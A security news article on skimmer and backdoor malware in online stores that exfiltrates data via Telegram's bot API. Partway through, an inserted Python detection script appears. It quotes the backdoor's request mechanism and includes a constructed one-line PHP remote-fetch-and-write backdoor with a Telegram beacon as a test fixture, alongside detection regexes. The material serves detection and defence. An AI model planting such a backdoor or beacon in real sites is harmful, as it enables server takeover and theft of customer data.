
Telegram app used by malware to infiltrate online stores

An ongoing trend observed by cybersecurity analysts and malware researchers reveals that the Telegram messaging service is being abused by malware authors who target e-commerce websites.

The findings published by the web security company Astra highlight that malware actors plant scripts on compromised websites which transmit error logs and other sensitive data to the attackers over encrypted Telegram channels.

“The error logs or sensitive information that are being sent to the hacker via Telegram is to check whether their malware is planted successfully on a website or not, and in another case, if the malware is planted successfully then they’re sending the sensitive information of the victims to a specific Telegram number or channel,” said Kanishk Tagade of Astra in a blog post.

“Magento, Prestashop and WooCommerce stores remain the top target of this hacking campaign,” he continued.

The use of an encrypted service lets attackers not only evade detection of their malicious traffic but also avoid being blacklisted: the data travels over Telegram’s own infrastructure, which many security products naturally trust, so the exfiltration looks like ordinary TLS traffic to a reputable domain.

Image: Malware infected PHP file flagged by Astra caught communicating with Telegram’s API

Astra’s engineers stated, “The hacker sends a request with $_POST['name'] = evil.php and $_POST['content'] = example.com/moreMaliciousCode.txt

“The backdoor script then creates a file called evil.php on the server with the file contents found in example.com/moreMaliciousCode.txt. The hacker then visits compromised-site.com/evil.php to execute the bad code.”

According to the engineers, the hacker group is called “B4JAT4X” based on the clues left in the malicious source code.
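The two behaviours described above, a file written to a request-chosen path with content fetched from a request-chosen URL, and a beacon to Telegram's bot API, are both visible in the PHP source and in egress logs. The following is an added example in Python, not code from Astra or from this article: a static triage of a webroot for those indicators, plus a check of egress logs for web servers that contact api.telegram.org (the point of the "trusted infrastructure" paragraph is that the traffic itself looks benign, so the alert has to come from who is talking, not where). Every regex, file name, fixture and log line in it is a constructed assumption.

```python
# Added example (not Astra's or the article's code): static triage of PHP
# files for the behaviours the article describes, plus an egress-log check.
# All patterns, file names and log lines are constructed for illustration.
import re
import tempfile
from pathlib import Path

# Indicator patterns, assumed from the behaviour described in the article.
INDICATORS = {
    # Outbound beacon/exfiltration to the Telegram Bot API.
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.I),
    "telegram_send_method": re.compile(r"\bsend(?:Message|Document)\b"),
    # File written to a request-chosen path with content fetched from a
    # request-chosen URL: the drop-and-execute pattern Astra describes.
    "remote_fetch_to_request_path": re.compile(
        r"file_put_contents\s*\(\s*\$_(?:POST|GET|REQUEST)\[[^\]]*\]\s*,"
        r"\s*file_get_contents\s*\(\s*\$_(?:POST|GET|REQUEST)\[",
        re.S,
    ),
    # Weaker signal: any write whose path comes straight from request input.
    "request_controlled_write": re.compile(
        r"file_put_contents\s*\(\s*\$_(?:POST|GET|REQUEST)\["
    ),
}


def scan_source(src: str) -> list[str]:
    """Return the names of the indicators present in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(src)]


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Scan every *.php file under root; map relative path -> indicators hit."""
    hits: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*.php")):
        found = scan_source(path.read_text(errors="replace"))
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits


# Constructed egress-log format (assumed): "<timestamp> <src_host> <dst_host>:<port>".
TELEGRAM_API_HOST = "api.telegram.org"


def web_hosts_reaching_telegram(log_lines, web_hosts) -> set[str]:
    """Web servers have no business calling the Telegram Bot API, so a hit
    here is alert-worthy even though the destination is a reputable domain."""
    flagged = set()
    for line in log_lines:
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines rather than fail the whole run
        _ts, src, dst = parts
        host = dst.rsplit(":", 1)[0]
        if src in web_hosts and host == TELEGRAM_API_HOST:
            flagged.add(src)
    return flagged


# Constructed fixtures (not real malware samples).
BACKDOOR_FIXTURE = r"""<?php
file_put_contents($_POST['name'], file_get_contents($_POST['content']));
$u = "https://api.telegram.org/bot<TOKEN>/sendMessage?chat_id=<ID>&text=ok";
"""
BENIGN_FIXTURE = r"""<?php
$cfg = json_decode(file_get_contents(__DIR__ . '/config.json'), true);
file_put_contents(__DIR__ . '/var/cache/page.html', $html);
"""
EGRESS_FIXTURE = [
    "2021-06-01T10:00:01Z web-01 api.telegram.org:443",
    "2021-06-01T10:00:02Z web-02 cdn.example.net:443",
    "2021-06-01T10:00:03Z laptop-7 api.telegram.org:443",
]


def demo() -> dict:
    """Write the fixtures into a temporary webroot, scan it, and check the log."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "app" / "Helper").mkdir(parents=True)
        (root / "app" / "Helper" / "Cache.php").write_text(BENIGN_FIXTURE)
        (root / "media").mkdir()
        (root / "media" / "index.php").write_text(BACKDOOR_FIXTURE)
        files = scan_tree(root)
    hosts = web_hosts_reaching_telegram(EGRESS_FIXTURE, {"web-01", "web-02"})
    return {"files": files, "hosts": sorted(hosts)}


if __name__ == "__main__":
    print(demo())
```

Run it against a real webroot by calling `scan_tree(Path("/var/www/html"))`; the patterns are deliberately narrow so that legitimate cache writers such as the benign fixture produce no hits, and the egress check is meant to be fed a list of known web-tier hosts so that a developer laptop using Telegram is not flagged.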

These findings follow a recent discovery by Malwarebytes where the company had found web skimmers stealing credit card information from infected websites and transmitting it over Telegram to the attackers.

With the rise in popularity of end-to-end encryption messaging platforms, attacks like these are only expected to grow and evolve with newer tactics.

“Security experts have long been recommending regular malware scanning as a key security measure for the safety of websites,” says Tagade.

“It is time you primed your websites with due security measures to keep it protected at all times,” he concluded.

Ax Sharma

Ax Sharma is a UK-based security researcher, journalist and TV subject matter expert experienced in malware analysis and cybercrime investigations. His areas of interest include open source software security and threat intel analysis. Frequently featured by leading media outlets like the BBC, Channel 5, Fortune, WIRED, The Register, among others, Ax is an active community member of the OWASP Foundation and the British Association of Journalists (BAJ).
